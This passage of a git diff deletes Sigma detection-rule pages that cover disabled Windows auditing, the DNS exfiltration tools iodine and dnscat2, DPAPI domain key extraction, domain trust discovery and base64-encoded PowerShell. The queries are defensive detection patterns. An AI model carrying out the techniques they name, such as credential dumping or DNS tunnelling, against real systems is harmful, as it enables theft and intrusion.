-| **ATT&amp;CK Technique** | <ul><li>[T1054: Indicator Blocking](https://attack.mitre.org/techniques/T1054)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://bit.ly/WinLogsZero2Hero](https://bit.ly/WinLogsZero2Hero)</li></ul>  |
-| **Author**               | @neu5ron |
-| Other Tags           | <ul><li>attack.t1562.006</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Disabling Windows Event Auditing
-id: 69aeb277-f15f-4d2d-b32a-55e883609563
-description: 'Detects scenarios where system auditing (ie: windows event log auditing) is disabled. This may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed. Also, it is recommended to turn off "Local Group Policy Object Processing" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as "gpedit.msc". Please note, that disabling "Local Group Policy Object Processing" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.'
-references:
-    - https://bit.ly/WinLogsZero2Hero
-tags:
-    - attack.defense_evasion
-    - attack.t1054
-    - attack.t1562.006
-author: '@neu5ron'
-date: 2017/11/19
-logsource:
-    product: windows
-    service: security
-    definition: 'Requirements: Audit Policy : Computer Management > Audit Policy Configuration, Group Policy : Computer Configuration\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit Authorization Policy Change'
-detection:
-    selection:
-        EventID: 4719
-        AuditPolicyChanges: 'removed'
-    condition: selection
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {($_.ID -eq "4719" -and $_.message -match "AuditPolicyChanges.*removed") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:"4719" AND winlog.event_data.AuditPolicyChanges:"removed")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/69aeb277-f15f-4d2d-b32a-55e883609563 <<EOF
-{
-  "metadata": {
-    "title": "Disabling Windows Event Auditing",
-    "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled. This may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed. Also, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\". Please note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1054",
-      "attack.t1562.006"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4719\" AND winlog.event_data.AuditPolicyChanges:\"removed\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4719\" AND winlog.event_data.AuditPolicyChanges:\"removed\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Disabling Windows Event Auditing'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"4719" AND AuditPolicyChanges:"removed")
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="4719" AuditPolicyChanges="removed")
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="4719" AuditPolicyChanges="removed")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*4719)(?=.*removed))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_dns_exfiltration_tools_execution.md b/Atomic_Threat_Coverage/Detection_Rules/win_dns_exfiltration_tools_execution.md
deleted file mode 100644
index f167da4..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_dns_exfiltration_tools_execution.md
+++ /dev/null
@@ -1,171 +0,0 @@
-| Title                    | DNS Exfiltration Tools Execution       |
-|:-------------------------|:------------------|
-| **Description**          | Well-known DNS Exfiltration tools execution |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0010: Exfiltration](https://attack.mitre.org/tactics/TA0010)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1048: Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0001_4688_windows_process_creation](../Data_Needed/DN0001_4688_windows_process_creation.md)</li><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1048: Exfiltration Over Alternative Protocol](../Triggers/T1048.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Legitimate usage of iodine or dnscat2 — DNS Exfiltration tools (unlikely)</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Daniil Yugoslavskiy, oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: DNS Exfiltration Tools Execution
-id: 98a96a5a-64a0-4c42-92c5-489da3866cb0
-description: Well-known DNS Exfiltration tools execution
-status: experimental
-author: Daniil Yugoslavskiy, oscd.community
-date: 2019/10/24
-tags:
-    - attack.exfiltration
-    - attack.t1048
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        - Image|endswith: '*\iodine.exe'
-        - Image|contains: '\dnscat2'
-    condition: selection
-falsepositives:
-    - Legitimate usage of iodine or dnscat2 — DNS Exfiltration tools (unlikely)
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and ($_.message -match "Image.*.*\\iodine.exe" -or $_.message -match "Image.*.*\\dnscat2.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:*\\iodine.exe OR winlog.event_data.Image.keyword:*\\dnscat2*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/98a96a5a-64a0-4c42-92c5-489da3866cb0 <<EOF
-{
-  "metadata": {
-    "title": "DNS Exfiltration Tools Execution",
-    "description": "Well-known DNS Exfiltration tools execution",
-    "tags": [
-      "attack.exfiltration",
-      "attack.t1048"
-    ],
-    "query": "(winlog.event_data.Image.keyword:*\\\\iodine.exe OR winlog.event_data.Image.keyword:*\\\\dnscat2*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\iodine.exe OR winlog.event_data.Image.keyword:*\\\\dnscat2*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'DNS Exfiltration Tools Execution'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:*\\iodine.exe OR Image.keyword:*\\dnscat2*)
-```
-
-
-### splunk
-    
-```
-(Image="*\\iodine.exe" OR Image="*\\dnscat2*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (Image="*\\iodine.exe" OR Image="*\\dnscat2*"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*.*\iodine\.exe|.*.*\dnscat2.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_dpapi_domain_backupkey_extraction.md b/Atomic_Threat_Coverage/Detection_Rules/win_dpapi_domain_backupkey_extraction.md
deleted file mode 100644
index f4d59ad..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_dpapi_domain_backupkey_extraction.md
+++ /dev/null
@@ -1,177 +0,0 @@
-| Title                    | DPAPI Domain Backup Key Extraction       |
-|:-------------------------|:------------------|
-| **Description**          | Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1003: OS Credential Dumping](https://attack.mitre.org/techniques/T1003)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1003: OS Credential Dumping](../Triggers/T1003.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/06_credential_access/T1003_credential_dumping/domain_dpapi_backupkey_extraction.md](https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/06_credential_access/T1003_credential_dumping/domain_dpapi_backupkey_extraction.md)</li></ul>  |
-| **Author**               | Roberto Rodriguez @Cyb3rWard0g |
-| Other Tags           | <ul><li>attack.t1003.004</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: DPAPI Domain Backup Key Extraction
-id: 4ac1f50b-3bd0-4968-902d-868b4647937e
-description: Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers
-status: experimental
-date: 2019/06/20
-author: Roberto Rodriguez @Cyb3rWard0g
-references:
-    - https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/06_credential_access/T1003_credential_dumping/domain_dpapi_backupkey_extraction.md
-tags:
-    - attack.credential_access
-    - attack.t1003
-    - attack.t1003.004
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        EventID: 4662
-        ObjectType: 'SecretObject'
-        AccessMask: '0x2'
-        ObjectName: 'BCKUPKEY'
-    condition: selection
-falsepositives:
-    - Unknown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {($_.ID -eq "4662" -and $_.message -match "ObjectType.*SecretObject" -and $_.message -match "AccessMask.*0x2" -and $_.message -match "ObjectName.*BCKUPKEY") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:"4662" AND winlog.event_data.ObjectType:"SecretObject" AND winlog.event_data.AccessMask:"0x2" AND winlog.event_data.ObjectName:"BCKUPKEY")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/4ac1f50b-3bd0-4968-902d-868b4647937e <<EOF
-{
-  "metadata": {
-    "title": "DPAPI Domain Backup Key Extraction",
-    "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1003",
-      "attack.t1003.004"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4662\" AND winlog.event_data.ObjectType:\"SecretObject\" AND winlog.event_data.AccessMask:\"0x2\" AND winlog.event_data.ObjectName:\"BCKUPKEY\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4662\" AND winlog.event_data.ObjectType:\"SecretObject\" AND winlog.event_data.AccessMask:\"0x2\" AND winlog.event_data.ObjectName:\"BCKUPKEY\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'DPAPI Domain Backup Key Extraction'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"4662" AND ObjectType:"SecretObject" AND AccessMask:"0x2" AND ObjectName:"BCKUPKEY")
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="4662" ObjectType="SecretObject" AccessMask="0x2" ObjectName="BCKUPKEY")
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="4662" ObjectType="SecretObject" AccessMask="0x2" ObjectName="BCKUPKEY")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*4662)(?=.*SecretObject)(?=.*0x2)(?=.*BCKUPKEY))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_dpapi_domain_masterkey_backup_attempt.md b/Atomic_Threat_Coverage/Detection_Rules/win_dpapi_domain_masterkey_backup_attempt.md
deleted file mode 100644
index b42fe1e..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_dpapi_domain_masterkey_backup_attempt.md
+++ /dev/null
@@ -1,178 +0,0 @@
-| Title                    | DPAPI Domain Master Key Backup Attempt       |
-|:-------------------------|:------------------|
-| **Description**          | Detects anyone attempting a backup for the DPAPI Master Key. This events gets generated at the source and not the Domain Controller. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1003: OS Credential Dumping](https://attack.mitre.org/techniques/T1003)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1003: OS Credential Dumping](../Triggers/T1003.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/06_credential_access/T1003_credential_dumping/domain_dpapi_backupkey_extraction.md](https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/06_credential_access/T1003_credential_dumping/domain_dpapi_backupkey_extraction.md)</li></ul>  |
-| **Author**               | Roberto Rodriguez @Cyb3rWard0g |
-| Other Tags           | <ul><li>attack.t1003.004</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: DPAPI Domain Master Key Backup Attempt
-id: 39a94fd1-8c9a-4ff6-bf22-c058762f8014
-description: Detects anyone attempting a backup for the DPAPI Master Key. This events gets generated at the source and not the Domain Controller.
-status: experimental
-date: 2019/08/10
-author: Roberto Rodriguez @Cyb3rWard0g
-references:
-    - https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/06_credential_access/T1003_credential_dumping/domain_dpapi_backupkey_extraction.md
-tags:
-    - attack.credential_access
-    - attack.t1003
-    - attack.t1003.004
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        EventID: 4692
-    condition: selection
-fields:
-    - ComputerName
-    - SubjectDomainName
-    - SubjectUserName
-falsepositives:
-    - Unknown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {($_.ID -eq "4692") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:"4692")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/39a94fd1-8c9a-4ff6-bf22-c058762f8014 <<EOF
-{
-  "metadata": {
-    "title": "DPAPI Domain Master Key Backup Attempt",
-    "description": "Detects anyone attempting a backup for the DPAPI Master Key. This events gets generated at the source and not the Domain Controller.",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1003",
-      "attack.t1003.004"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4692\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4692\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'DPAPI Domain Master Key Backup Attempt'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n     ComputerName = {{_source.ComputerName}}\nSubjectDomainName = {{_source.SubjectDomainName}}\n  SubjectUserName = {{_source.SubjectUserName}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-EventID:"4692"
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="4692") | table ComputerName,SubjectDomainName,SubjectUserName
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="4692")
-```
-
-
-### grep
-    
-```
-grep -P '^4692'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_dsquery_domain_trust_discovery.md b/Atomic_Threat_Coverage/Detection_Rules/win_dsquery_domain_trust_discovery.md
deleted file mode 100644
index 17e5967..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_dsquery_domain_trust_discovery.md
+++ /dev/null
@@ -1,178 +0,0 @@
-| Title                    | Domain Trust Discovery       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a discovery of domain trusts |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0007: Discovery](https://attack.mitre.org/tactics/TA0007)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1482: Domain Trust Discovery](https://attack.mitre.org/techniques/T1482)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1482: Domain Trust Discovery](../Triggers/T1482.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Administration of systems</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.yaml](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.yaml)</li></ul>  |
-| **Author**               | Jakob Weinzettl, oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Domain Trust Discovery
-id: 77815820-246c-47b8-9741-e0def3f57308
-status: experimental
-description: Detects a discovery of domain trusts
-references:
-    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.yaml
-author: Jakob Weinzettl, oscd.community
-date: 2019/10/23
-modified: 2019/11/08
-tags:
-    - attack.discovery
-    - attack.t1482
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-      - Image|endswith: '\dsquery.exe'
-        CommandLine|contains|all:
-            - '-filter'
-            - 'trustedDomain'
-      - Image|endswith: '\nltest.exe'
-        CommandLine|contains: 'domain_trusts'
-    condition: selection
-falsepositives:
-    - Administration of systems
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and (($_.message -match "Image.*.*\\dsquery.exe" -and $_.message -match "CommandLine.*.*-filter.*" -and $_.message -match "CommandLine.*.*trustedDomain.*") -or ($_.message -match "Image.*.*\\nltest.exe" -and $_.message -match "CommandLine.*.*domain_trusts.*"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.Image.keyword:*\\dsquery.exe AND winlog.event_data.CommandLine.keyword:*\-filter* AND winlog.event_data.CommandLine.keyword:*trustedDomain*) OR (winlog.event_data.Image.keyword:*\\nltest.exe AND winlog.event_data.CommandLine.keyword:*domain_trusts*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/77815820-246c-47b8-9741-e0def3f57308 <<EOF
-{
-  "metadata": {
-    "title": "Domain Trust Discovery",
-    "description": "Detects a discovery of domain trusts",
-    "tags": [
-      "attack.discovery",
-      "attack.t1482"
-    ],
-    "query": "((winlog.event_data.Image.keyword:*\\\\dsquery.exe AND winlog.event_data.CommandLine.keyword:*\\-filter* AND winlog.event_data.CommandLine.keyword:*trustedDomain*) OR (winlog.event_data.Image.keyword:*\\\\nltest.exe AND winlog.event_data.CommandLine.keyword:*domain_trusts*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.Image.keyword:*\\\\dsquery.exe AND winlog.event_data.CommandLine.keyword:*\\-filter* AND winlog.event_data.CommandLine.keyword:*trustedDomain*) OR (winlog.event_data.Image.keyword:*\\\\nltest.exe AND winlog.event_data.CommandLine.keyword:*domain_trusts*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Domain Trust Discovery'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((Image.keyword:*\\dsquery.exe AND CommandLine.keyword:*\-filter* AND CommandLine.keyword:*trustedDomain*) OR (Image.keyword:*\\nltest.exe AND CommandLine.keyword:*domain_trusts*))
-```
-
-
-### splunk
-    
-```
-((Image="*\\dsquery.exe" CommandLine="*-filter*" CommandLine="*trustedDomain*") OR (Image="*\\nltest.exe" CommandLine="*domain_trusts*"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ((Image="*\\dsquery.exe" CommandLine="*-filter*" CommandLine="*trustedDomain*") OR (Image="*\\nltest.exe" CommandLine="*domain_trusts*")))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*(?=.*.*\dsquery\.exe)(?=.*.*-filter.*)(?=.*.*trustedDomain.*))|.*(?:.*(?=.*.*\nltest\.exe)(?=.*.*domain_trusts.*))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_encoded_frombase64string.md b/Atomic_Threat_Coverage/Detection_Rules/win_encoded_frombase64string.md
deleted file mode 100644
index 4f524ea..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_encoded_frombase64string.md
+++ /dev/null
@@ -1,179 +0,0 @@
-| Title                    | Encoded FromBase64String       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a base64 encoded FromBase64String keyword in a process command line |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li><li>[T1140: Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1140: Deobfuscate/Decode Files or Information](../Triggers/T1140.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Encoded FromBase64String
-id: fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c
-status: experimental
-description: Detects a base64 encoded FromBase64String keyword in a process command line
-author: Florian Roth
-date: 2019/08/24
-tags:
-    - attack.t1086
-    - attack.t1140
-    - attack.execution
-    - attack.defense_evasion
-    - attack.t1059.001
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine|base64offset|contains: '::FromBase64String'
-    condition: selection
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - unknown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*.*OjpGcm9tQmFzZTY0U3RyaW5n.*" -or $_.message -match "CommandLine.*.*o6RnJvbUJhc2U2NFN0cmluZ.*" -or $_.message -match "CommandLine.*.*6OkZyb21CYXNlNjRTdHJpbm.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:(*OjpGcm9tQmFzZTY0U3RyaW5n* OR *o6RnJvbUJhc2U2NFN0cmluZ* OR *6OkZyb21CYXNlNjRTdHJpbm*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c <<EOF
-{
-  "metadata": {
-    "title": "Encoded FromBase64String",
-    "description": "Detects a base64 encoded FromBase64String keyword in a process command line",
-    "tags": [
-      "attack.t1086",
-      "attack.t1140",
-      "attack.execution",
-      "attack.defense_evasion",
-      "attack.t1059.001"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:(*OjpGcm9tQmFzZTY0U3RyaW5n* OR *o6RnJvbUJhc2U2NFN0cmluZ* OR *6OkZyb21CYXNlNjRTdHJpbm*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
